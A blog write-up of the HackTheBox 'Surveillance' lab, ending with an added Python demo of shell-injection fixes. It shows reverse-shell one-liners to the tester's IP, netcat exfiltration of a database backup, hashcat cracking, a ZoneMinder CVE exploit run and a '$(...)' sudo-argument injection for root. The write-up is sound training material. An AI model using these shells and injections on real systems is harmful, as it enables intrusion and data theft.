Willem Medendorp's Blog

Surveillance

🏷️ [Machine,HackTheBox]

Intro

The box seems to be for a surveillance camera service. It does not give a clear indication of what the foothold would be.

Discovery

The website appears to be built with Craft CMS. The page source does not reveal anything interesting, just basic markup. demo@surveillance.htb is listed as an email address, and there are no other links. The initial nmap scan is quite sparse:

sudo nmap -sC -sV -oA nmap surveillance.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-12 22:25 CET
Nmap scan report for surveillance.htb (10.10.11.245)
Host is up (0.026s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
|_  256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title:  Surveillance 
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds

We have to try some more enumeration. http://surveillance.htb/admin/login serves a login page.

The latest release of Craft seems to be 4.6.0, whilst the home page suggests it is running 4.4.14. In the release notes for 4.5.14 they mention: "Fixed a privilege escalation vulnerability." So this is something we may have to use later on. 4.5.12 again lists "Fixed a privilege escalation vulnerability", as does 4.5.7. 4.5.6 seems to contain an RCE fix: "Fixed an RCE vulnerability."

Let's have a try at this.

Getting user

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

This PoC first failed, but seemed to have been updated by the time I came back to this machine, and now gives a shell:

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Let's first set up a more stable reverse shell. We started a new reverse shell using PHP:

php -r '$sock=fsockopen("10.10.14.137",9000);exec("sh <&3 >&3 2>&3");'

We upgraded this shell and can now start looking around.

The folder in which we start seems to contain mostly ordinary web files. By running find . we can quickly list all directory contents.

Going up some directories we find a /storage directory; running find on that shows storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip, which might be interesting.

Database dump

We set up a new netcat listener on our host:

host: nc -lp 9001 -q 1 > baseout

On the machine we then encode the file using base64 and send it:

machine: cat ./storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip | base64 | nc 10.10.14.137 9001

On our host we can now decode and unzip it:

base64 -d baseout > data.zip && unzip data.zip

Searching for a password or username

INSERT INTO `searchindex` VALUES (1,'email',0,1,' admin surveillance htb '),(1,'firstname',0,1,' matthew '),(1,'fullname',0,1,' matthew b '),(1,'lastname',0,1,' b '),(1,'slug',0,1,''),(1,'username',0,1,' admin '),(2,'slug',0,1,' home '),(2,'title',0,1,' home '),(7,'slug',0,1,' coming soon '),(7,'title',0,1,' coming soon ');
/*!40000 ALTER TABLE `searchindex` ENABLE KEYS */;
UNLOCK TABLES;
commit;

Maybe we can find Matthew's password somewhere.

This seems like the admin entry:

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
set autocommit=0;
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
commit;

Where 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec is the password hash.

Cracking the password

Using hashid we can discover what type of hash it is.

hashid 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec

SHA-256 seems the most likely.

We can try to crack it using hashcat (mode 1400 is raw SHA-256):

hashcat -m 1400 -a 0 hash /usr/share/wordlist/rockyou.txt

And we find it: 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490

With user matthew and password starcraft122490 we log in via SSH, and we get the user flag: ff5294207dafe5b5ca1ff61f1bfc5ddb

Root

In the user's home directory we cannot see anything special, so we need some more enumeration here. We upload linpeas via our default approach and run it.

Linpeas

There seems to be a second user with a login shell: zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash. Along with it there is more nginx configuration for zm (ZoneMinder).

Probing around

If we run curl localhost:8080 we get served a page of the ZoneMinder application; this will probably be our way forward.

There seems to be a PoC available at https://github.com/rvizx/CVE-2023-26035. To use the exploit we must first forward the port to our host:

ssh -L 8080:localhost:8080 matthew@surveillance.htb

Then we again set up a nc listener and execute the PoC:

nc -lvnp 9000
python root-exploit.py -t http://localhost:8080 -ip 10.10.14.137 -p 9000

And we get a shell as the zoneminder user.

Root stage 2

zoneminder does have sudo rights:

sudo -l
Matching Defaults entries for zoneminder on surveillance:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User zoneminder may run the following commands on surveillance:
    (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
zoneminder@surveillance:/usr/share/zoneminder/www$ 

It seems clear that we want to inject our command somewhere using one of the zm*.pl scripts. We cannot, however, just drop our own script there; the sudo rule only matches existing files in /usr/bin. Let's see what tools are already available:

zmaudit.pl    zmfilter.pl         zmrecover.pl    zmtrack.pl    zmwatch.pl
zmcamtool.pl  zmonvif-probe.pl    zmstats.pl      zmtrigger.pl  zmx10.pl
zmcontrol.pl  zmonvif-trigger.pl  zmsystemctl.pl  zmupdate.pl
zmdc.pl       zmpkg.pl            zmtelemetry.pl  zmvideo.pl

These are all the Perl scripts we can execute as root; one of them may offer a way to run commands. If we audit the code a bit we find that zmupdate.pl builds a shell command from its arguments, so we can easily inject our own shell bits in the form of a user name.

So we create a small script with a reverse shell:

echo "busybox nc 10.10.14.137 9001 -e bash" >> privesc.sh && chmod +x privesc.sh

On our host we set up a netcat listener:

nc -lnvp 9001

We then run:

sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/privesc.sh)'

And we get a root shell on our new netcat connection, with the root flag: 29973ba58778775d0cffc2be10ff92fb
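The root cause of that last step is an argument pasted into a shell command string. As an added example (my own code, not ZoneMinder's and not part of the original writeup), the Python below reproduces that pattern with echo standing in for the real database client, and shows two fixes that keep the value literal. The function names and the probe value are assumptions for illustration only.

```python
import shlex
import subprocess


def build_unsafe_command(db_user: str) -> str:
    """Assumed pattern (not the project's code): the --user value is pasted
    straight into one string that is handed to /bin/sh. echo stands in for
    the real database client so this runs offline."""
    return f"echo --user={db_user}"


def run_unsafe(db_user: str) -> str:
    # shell=True: the shell parses the whole string, so a $(...) inside
    # db_user is executed before echo ever sees its argument.
    cmd = build_unsafe_command(db_user)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_quoted(db_user: str) -> str:
    # Fix 1: still a shell string, but shlex.quote() wraps the value in
    # single quotes so the shell treats it as one literal word.
    cmd = f"echo --user={shlex.quote(db_user)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_argv(db_user: str) -> str:
    # Fix 2 (preferred): no shell at all. The argv list delivers the value
    # verbatim as a single argument, so there is nothing to expand.
    return subprocess.run(["echo", f"--user={db_user}"],
                          capture_output=True, text=True).stdout.strip()


# Constructed, harmless stand-in for the $(...) argument used in the writeup.
PROBE = "$(echo injected)"

if __name__ == "__main__":
    print("unsafe :", run_unsafe(PROBE))   # --user=injected  (subshell ran)
    print("quoted :", run_quoted(PROBE))   # --user=$(echo injected)
    print("argv   :", run_argv(PROBE))     # --user=$(echo injected)
```

The same reasoning applies to a sudo rule like the one above: once any argument reaches a shell string unquoted, the trailing * in the sudoers entry hands the caller full control over what runs as root.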

Copyright 2025
Willem Medendorp